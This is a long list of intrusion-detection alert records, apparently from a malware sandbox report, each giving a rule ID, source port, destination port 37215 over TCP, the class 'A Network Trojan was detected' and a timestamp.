                  SID:2835222
                  Source Port:35166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2829579
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2835222
                  Source Port:33620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2829579
                  Source Port:36862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641053
                  SID:2835222
                  Source Port:44422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2829579
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.245837
                  SID:2829579
                  Source Port:54650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2835222
                  Source Port:37564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.946996
                  SID:2835222
                  Source Port:49696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866987
                  SID:2835222
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2835222
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029252
                  SID:2829579
                  Source Port:33950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2829579
                  Source Port:57838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.851521
                  SID:2835222
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2829579
                  Source Port:59050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2835222
                  Source Port:34140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.372356
                  SID:2835222
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909293
                  SID:2835222
                  Source Port:44614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2829579
                  Source Port:46522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.758583
                  SID:2835222
                  Source Port:41216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.657807
                  SID:2835222
                  Source Port:49862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2835222
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2835222
                  Source Port:46984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585966
                  SID:2829579
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962148
                  SID:2835222
                  Source Port:54520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2835222
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2835222
                  Source Port:57420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190814
                  SID:2835222
                  Source Port:51542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2829579
                  Source Port:44938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2835222
                  Source Port:54760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339308
                  SID:2829579
                  Source Port:55594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:37710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2835222
                  Source Port:37976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2829579
                  Source Port:34776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2835222
                  Source Port:59044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.254772
                  SID:2835222
                  Source Port:54992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2829579
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2835222
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.854070
                  SID:2835222
                  Source Port:33084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623899
                  SID:2835222
                  Source Port:42828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.364400
                  SID:2835222
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.169251
                  SID:2835222
                  Source Port:52326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.803873
                  SID:2835222
                  Source Port:60136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.233707
                  SID:2835222
                  Source Port:43326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.250485
                  SID:2829579
                  Source Port:47104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.469878
                  SID:2829579
                  Source Port:35780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2829579
                  Source Port:47088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590532
                  SID:2835222
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2835222
                  Source Port:40278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2835222
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2829579
                  Source Port:42242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2835222
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.752992
                  SID:2835222
                  Source Port:41148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946860
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2829579
                  Source Port:48948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2829579
                  Source Port:50990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.020440
                  SID:2829579
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.244290
                  SID:2829579
                  Source Port:49420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2835222
                  Source Port:49482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625534
                  SID:2835222
                  Source Port:41804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867398
                  SID:2835222
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.998541
                  SID:2835222
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2835222
                  Source Port:44822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800070
                  SID:2829579
                  Source Port:55272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2835222
                  Source Port:33096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969551
                  SID:2835222
                  Source Port:51740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2829579
                  Source Port:45640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2835222
                  Source Port:33804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.403576
                  SID:2835222
                  Source Port:51474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.774026
                  SID:2829579
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2829579
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633105
                  SID:2835222
                  Source Port:32972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2829579
                  Source Port:50686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.307803
                  SID:2829579
                  Source Port:55196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2835222
                  Source Port:33970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2829579
                  Source Port:34838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343044
                  SID:2829579
                  Source Port:53584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.558388
                  SID:2835222
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804640
                  SID:2829579
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2835222
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070020
                  SID:2829579
                  Source Port:35930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2829579
                  Source Port:50492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868554
                  SID:2829579
                  Source Port:36482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2835222
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.193965
                  SID:2829579
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.519267
                  SID:2835222
                  Source Port:36634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2829579
                  Source Port:58944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.436856
                  SID:2835222
                  Source Port:47012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2835222
                  Source Port:58366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633014
                  SID:2829579
                  Source Port:49316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2829579
                  Source Port:54890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366758
                  SID:2835222
                  Source Port:55120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.889916
                  SID:2835222
                  Source Port:56972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.090414
                  SID:2829579
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2835222
                  Source Port:38676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2835222
                  Source Port:36324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.795210
                  SID:2829579
                  Source Port:35426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908233
                  SID:2835222
                  Source Port:52130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.558999
                  SID:2835222
                  Source Port:38440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169411
                  SID:2829579
                  Source Port:59604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2829579
                  Source Port:55862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.634694
                  SID:2835222
                  Source Port:56974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2835222
                  Source Port:51644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529436
                  SID:2835222
                  Source Port:46332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2829579
                  Source Port:60760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2829579
                  Source Port:35658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2829579
                  Source Port:33944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2835222
                  Source Port:44478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2829579
                  Source Port:48638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2829579
                  Source Port:60460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642671
                  SID:2829579
                  Source Port:46814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970962
                  SID:2829579
                  Source Port:44982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527598
                  SID:2835222
                  Source Port:50794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.164570
                  SID:2835222
                  Source Port:58956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2829579
                  Source Port:37142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839655
                  SID:2829579
                  Source Port:42916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.645172
                  SID:2835222
                  Source Port:42096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2835222
                  Source Port:33072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580181
                  SID:2829579
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2835222
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2835222
                  Source Port:51350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.976609
                  SID:2829579
                  Source Port:46674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007321
                  SID:2835222
                  Source Port:46172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2835222
                  Source Port:54598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2835222
                  Source Port:44290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869388
                  SID:2829579
                  Source Port:54876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2829579
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2835222
                  Source Port:33652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2829579
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2829579
                  Source Port:32830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373846
                  SID:2835222
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.182396
                  SID:2829579
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.067325
                  SID:2835222
                  Source Port:35084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2835222
                  Source Port:49654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.534474
                  SID:2835222
                  Source Port:44264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551346
                  SID:2829579
                  Source Port:40666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076379
                  SID:2835222
                  Source Port:44334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877508
                  SID:2835222
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825579
                  SID:2829579
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.011385
                  SID:2829579
                  Source Port:39944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397076
                  SID:2835222
                  Source Port:45084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.822665
                  SID:2829579
                  Source Port:51854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.035861
                  SID:2835222
                  Source Port:51836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249452
                  SID:2829579
                  Source Port:60052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926272
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.868909
                  SID:2835222
                  Source Port:51100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2835222
                  Source Port:53646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.546136
                  SID:2835222
                  Source Port:36880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765869
                  SID:2835222
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2829579
                  Source Port:48538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2829579
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.886782
                  SID:2835222
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2829579
                  Source Port:58784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:43346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2835222
                  Source Port:44146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996261
                  SID:2835222
                  Source Port:58632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953100
                  SID:2835222
                  Source Port:44884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2835222
                  Source Port:33876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511682
                  SID:2835222
                  Source Port:42872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2835222
                  Source Port:39464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2835222
                  Source Port:49608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225054
                  SID:2835222
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:40320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925021
                  SID:2829579
                  Source Port:51242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778928
                  SID:2835222
                  Source Port:46954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2829579
                  Source Port:59016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.342086
                  SID:2835222
                  Source Port:56828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373908
                  SID:2829579
                  Source Port:35398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2829579
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2829579
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2829579
                  Source Port:41126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662909
                  SID:2829579
                  Source Port:42148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2835222
                  Source Port:40824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2835222
                  Source Port:38308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847591
                  SID:2835222
                  Source Port:47490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.270809
                  SID:2829579
                  Source Port:53710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2835222
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2829579
                  Source Port:35962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2829579
                  Source Port:46898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2835222
                  Source Port:45752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2835222
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
